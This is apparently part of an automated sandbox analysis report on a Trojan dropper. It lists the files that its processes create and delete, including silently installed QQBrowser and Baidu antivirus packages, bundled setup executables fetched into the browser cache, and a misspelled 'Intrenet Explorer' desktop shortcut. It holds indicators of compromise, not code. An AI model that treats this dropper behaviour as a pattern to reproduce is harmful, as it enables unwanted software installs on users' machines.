%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\TrustAndIso.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\KavUpdate.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\TrayPluginContainerConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDMNet.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\CoolyContainerConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDMUpdate.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BaiduSdSvc.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\PrivacyProtect.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\systemfile.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\tuopan.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDMSkin.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDMReport.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\iexplore.exe.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDMTinyXml.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\DesktopToast.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\KVRtp_PluginConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp (0 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDDownloader.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\fm.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\virus_type.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\804.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDMEvents.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\baidusdRepair.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\Repair_PluginConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BaiduSdUProxy64.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDMAVEng.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BaiduSdUpdate.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BaiduSdBugRpt.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDPerflog.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDKVRmvDevPlugin.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDMAVE.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\bdmp.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\duilib license.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BaiduSdTray.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDKVLogs.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDMLog.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\NetService.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDConfig.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BSRLib.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDMSREng.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDKVDeskBand.dll (0 bytes)

The process QQBrowser_Setup:2052 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{B9C6ADA1-8B36-4c8d-97E5-1F89AE3A5341}\images\blue.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\WebpDecodeFilter.dll (5064 bytes)
%Program Files%\Tencent\QQBrowser\QuickLaunchPined\QQBrowser.lnk (776 bytes)
%Program Files%\Tencent\QQBrowser\QQBrowser.exe (601 bytes)
%Program Files%\Tencent\QQBrowser\QRCode.dll (31 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Thumb\qqbrowser_home.png (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\BugReport.exe (7192 bytes)
%Program Files%\Tencent\QQBrowser\dr.dll (601 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\{B00DFF21-511E-4249-BCB9-EECC370D796B} (419 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\res\InstallFileList.txt (356 bytes)
%Program Files%\Tencent\QQBrowser\MouseGesture.dll (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400 (4 bytes)
%Program Files%\Tencent\QQBrowser\Html\certerror.html (6 bytes)
%Program Files%\Tencent\QQBrowser\Microsoft.VC90.CRT\msvcr90.dll (22192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\QQBrowser.exe (4992 bytes)
%Program Files%\Tencent\QQBrowser\Dialogs.dll (7385 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\PrScrn.dll (7192 bytes)
%Program Files%\Tencent\QQBrowser\QBSafe.dll (601 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\HomePage\index.ini (16 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Thumb\http___gameapp.qq.com__via=QQBrowser.grids&pf=browser.png (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\res\nsis_skin.gt (5520 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{B9C6ADA1-8B36-4c8d-97E5-1F89AE3A5341}\reader.html (784 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\{6970B802-2F13-4038-B620-33B0211D26A0} (3616 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\DB\random.db (10 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\QQBrowser.lnk (860 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\uninst.exe (9608 bytes)
%Program Files%\Tencent\QQBrowser\QQBrowserFrame.dll (8657 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Tencent\QQBrowser\QQBrowser.lnk (856 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{00000000-0000-0000-0000-000000000000}\jquery.js (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\res (4 bytes)
%Program Files%\Tencent\QQBrowser\QQBrowserLiveup.exe (1425 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\{3E9C7A5B-D249-4C28-A451-53E1024AD354} (2 bytes)
%Program Files%\Tencent\QQBrowser\Html\images\pixel.gif (43 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{B9C6ADA1-8B36-4c8d-97E5-1F89AE3A5341}\images\pink.png (716 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Adblock\mainlist.ze (1552 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\HomePage\0\website\index.html (3312 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Thumb\http___browser.qq.com_new_wechat1.0.html_type=1.png (7 bytes)
%Program Files%\Tencent\QQBrowser\WebpDecodeFilter.dll (673 bytes)
%Program Files%\Tencent\QQBrowser\skin\ThirdParty.gt (8560 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{B9C6ADA1-8B36-4c8d-97E5-1F89AE3A5341}\js\injectReader.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\QBSafe.dll (4992 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\HomePage\0\website\icon.fw.png (8 bytes)
%Program Files%\Tencent\QQBrowser\Html\images\icon_not_recommended.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\InstModules\Microsoft.VC90.CRT\msvcp90.dll (19152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\app.ico (3312 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{5062F1C6-D76B-43c8-ADAE-D060662C6546}\extplayer.js (784 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\HomePage\0\website\imgSearch.png (10 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Thumb\http___www.qq.com_.png (9 bytes)
%Program Files%\Tencent\QQBrowser\Html\images\bkg.gif (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\QBUtils.dll (44462 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\Assistant.dll (13584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\QQBrowserLiveup.exe (11048 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{5FD65AEB-B895-446A-915D-72B6D4886A0E}.qrx (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\NetWork.dll (6584 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{B9C6ADA1-8B36-4c8d-97E5-1F89AE3A5341}\images\yellow.png (626 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\res\CustomerJoinPlan.txt (1 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{B9C6ADA1-8B36-4c8d-97E5-1F89AE3A5341}\images\green.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Liveup\Temp\Microsoft.VC90.CRT\Microsoft.VC90.CRT.manifest (1 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\qqtrack.xml (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\navi.ico (15 bytes)
%Program Files%\Tencent\QQBrowser\Downloader.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\QRCode.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\QQBrowserFrame.dll (78658 bytes)
%Program Files%\Tencent\QQBrowser\Html\error.html (8 bytes)
%Program Files%\Tencent\QQBrowser\QBExtensionFramework.dll (2321 bytes)
%Program Files%\Tencent\QQBrowser\PrScrn.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\QQBrowserSecurityCenter.exe (6360 bytes)
%Program Files%\Tencent\QQBrowser\tssafeedit.dat (41 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\InstModules\QBUtils.dll (44462 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\HomePage\0\website\bggradient_day.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Liveup\Temp\QQBrowserLiveup.exe (11048 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\{B00D20E2-207A-431A-9712-E1279792681B} (89 bytes)
%Program Files%\Tencent\QQBrowser\interuninst.exe (4248 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\tssafeedit.dat (1552 bytes)
%Program Files%\Tencent\QQBrowser\Html\small.html (4 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\{CAA4306F-826C-4c1b-8FC6-571F84949DB4} (6 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Adblock\wbg.png (136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\dr.dll (3312 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{B9C6ADA1-8B36-4c8d-97E5-1F89AE3A5341}\images\gray.png (501 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\InstallHelper.dll (7192 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Video\vd.ini (1 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\DB\history.db (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\TridentCore.dll (30344 bytes)
%Program Files%\Tencent\QQBrowser\uninst.exe (1425 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\DB\homepage.db (3 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\{3349050F-829E-4bb2-AACF-03E3A6B68677} (4 bytes)
%Program Files%\Tencent\QQBrowser\skin\LightStripes.gt (6584 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{B9C6ADA1-8B36-4c8d-97E5-1F89AE3A5341}\images\night.png (546 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskA7.tmp (269396 bytes)
%Program Files%\Tencent\QQBrowser\Resource.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\res\TaskbarHelper.exe (1856 bytes)
%Documents and Settings%\%current user%\Desktop\ÃƒÂ¤Ã‚Â¸Ã…Â ÃƒÂ§Ã‚Â½Ã¢â‚¬ËœÃƒÂ¥Ã‚Â¯Ã‚Â¼ÃƒÂ¨Ã‹â€ Ã‚Âª.lnk (1 bytes)
%Documents and Settings%\%current user%\Desktop\QQBrowser.lnk (834 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Liveup\Temp\QBUtils.dll (44462 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\Dialogs.dll (32824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\Downloader.dll (15536 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Adblock\{43789A6F-8316-54A6-96D4-87874B9CC177} (5 bytes)
%Program Files%\Tencent\QQBrowser\Microsoft.VC90.CRT\msvcp90.dll (19152 bytes)
%Program Files%\Tencent\QQBrowser\navi.ico (15 bytes)
%Program Files%\Tencent\QQBrowser\Html\private.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Adblock\whitelist.ze (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\Resource.dll (5064 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{B9C6ADA1-8B36-4c8d-97E5-1F89AE3A5341}\css\articlecontent.css (12 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Thumb\http___app.browser.qq.com_.png (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\QBExtensionFramework.dll (15536 bytes)
%Program Files%\Tencent\QQBrowser\Html\images\hse.png (4 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{B9C6ADA1-8B36-4c8d-97E5-1F89AE3A5341}\images\image.png (5 bytes)
%Program Files%\Tencent\QQBrowser\StartMenuPined\QQBrowser.lnk (772 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Liveup\Temp\Microsoft.VC90.CRT\msvcp90.dll (19152 bytes)
%Program Files%\Tencent\QQBrowser\app.ico (601 bytes)
%Program Files%\Tencent\QQBrowser\Html\images\shadow-bottom.png (2 bytes)
%Program Files%\Tencent\QQBrowser\Html\images\small.png (2 bytes)
%Program Files%\Tencent\QQBrowser\Microsoft.VC90.CRT\Microsoft.VC90.CRT.manifest (1 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Thumb\http___qzone.qq.com_.png (5 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Liveup\Temp\Microsoft.VC90.CRT\msvcr90.dll (22192 bytes)
%Program Files%\Tencent\QQBrowser\QQBrowserSecurityCenter.exe (673 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\InstModules\Microsoft.VC90.CRT\msvcr90.dll (22192 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{B9C6ADA1-8B36-4c8d-97E5-1F89AE3A5341}\css\screen.css (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\MouseGesture.dll (1856 bytes)
%Program Files%\Tencent\QQBrowser\skin\DarkStripes.gt (6360 bytes)
%Program Files%\Tencent\QQBrowser\NetWork.dll (673 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\HomePage\0\website\bgsearch_day.jpg (4 bytes)
%Program Files%\Tencent\QQBrowser\Html\images\icon_suggested_action.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\InstModules\Microsoft.VC90.CRT\Microsoft.VC90.CRT.manifest (1 bytes)
%Program Files%\Tencent\QQBrowser\TridentCore.dll (6841 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Thumb\https___mail.qq.com_.png (12 bytes)
%Program Files%\Tencent\QQBrowser\Html\images\Private-icon.png (3 bytes)
%Program Files%\Tencent\QQBrowser\QBUtils.dll (10177 bytes)
%Program Files%\Tencent\QQBrowser\BugReport.exe (1281 bytes)
%Program Files%\Tencent\QQBrowser\Assistant.dll (2321 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}.qrx (1552 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\WebpDecodeFilter.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\Resource.dll (0 bytes)
%Program Files%\Tencent\QQBrowser\QuickLaunchPined\QQBrowser.lnk (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\QBExtensionFramework.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\tssafeedit.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\QBSafe.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\BugReport.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\dr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\res (0 bytes)
%Program Files%\Tencent\QQBrowser\StartMenuPined (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\res\InstallFileList.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\InstallHelper.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\app.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsuA6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\QBUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\Assistant.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\MouseGesture.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\QQBrowser.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\QQBrowserLiveup.exe (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{5FD65AEB-B895-446A-915D-72B6D4886A0E}.qrx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\PrScrn.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\NetWork.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\res\CustomerJoinPlan.txt (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}.qrx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\res\nsis_skin.gt (0 bytes)
%Program Files%\Tencent\QQBrowser\QuickLaunchPined (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\res\TaskbarHelper.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\TridentCore.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\navi.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\QRCode.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\QQBrowserFrame.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\uninst.exe (0 bytes)
%Program Files%\Tencent\QQBrowser\StartMenuPined\QQBrowser.lnk (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\Dialogs.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\QQBrowserSecurityCenter.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400\Downloader.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaA8.tmp\7.7.24289.400 (0 bytes)

The process BDDownloader.exe:2920 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nscAF.tmp\System.dll (784 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\dl.dll (65930 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\BDDownloader_Installer\1.0.106.1[2014-10-16-21-13-3]\bddownloader.exe (41699 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\BDDownloader_Installer\1.0.106.1[2014-10-16-21-13-3]\bdcomproxy.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\BDDownloader_Installer\1.0.106.1[2014-10-16-21-13-3]\dl.dll (65930 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsnAE.tmp (90616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\BDDownloader_Installer\1.0.106.1[2014-10-16-21-13-3]\7z.dll (12536 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nscAF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshAD.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscAF.tmp\System.dll (0 bytes)

The process %original file name%.exe:1268 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsh7F.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Program Files%\SetupIns\Uninstall.exe (673 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\SetupIns\uninst.lnk (647 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\iplookup[1].htm (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh7F.tmp\i.rar (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh7F.tmp\2.ico (7738 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh7F.tmp\nsProcess.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh7F.tmp\%original file name%.exe (673 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (964 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sina.com[1].txt (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh7F.tmp\Inetc.dll (20 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsh7F.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss7E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh7F.tmp\nsm80.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh7F.tmp\2.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh7F.tmp\nsProcess.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh7F.tmp\%original file name%.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh7F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh7F.tmp\Inetc.dll (0 bytes)

The process %original file name%.exe:1312 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\netbian_a_41763[1].exe (324295 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm82.tmp\G0828_s_70988.exe (1885987 bytes)
%Documents and Settings%\%current user%\Desktop\Intrenet Explorer.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm82.tmp\netbian_a_41763.exe (324295 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\setup_3386[1].exe (244814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\F0916_s_30911[1].exe (781536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\2[1].ico (35544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\iplookup[1].htm (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\BaiduPlayerNetSetup_481[1].exe (41752 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\QQBrowser_Setup_Hk_78653[1].exe (272005 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm82.tmp\nsProcess.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm82.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm82.tmp\QQBrowser_Setup_Hk_78653.exe (272005 bytes)
%Program Files%\SetupIns\Uninstall.exe (673 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\SetupIns\uninst.lnk (647 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm82.tmp\i.rar (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm82.tmp\F0916_s_30911.exe (781536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm82.tmp\2.ico (7738 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm82.tmp\4.ico (35544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\G0828_s_70988[1].exe (1885987 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm82.tmp\Inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\9377mycs_Y_mgaz2_01[1].exe (63911 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm82.tmp\setup_3386.exe (244814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm82.tmp\BaiduPlayerNetSetup_481.exe (41752 bytes)
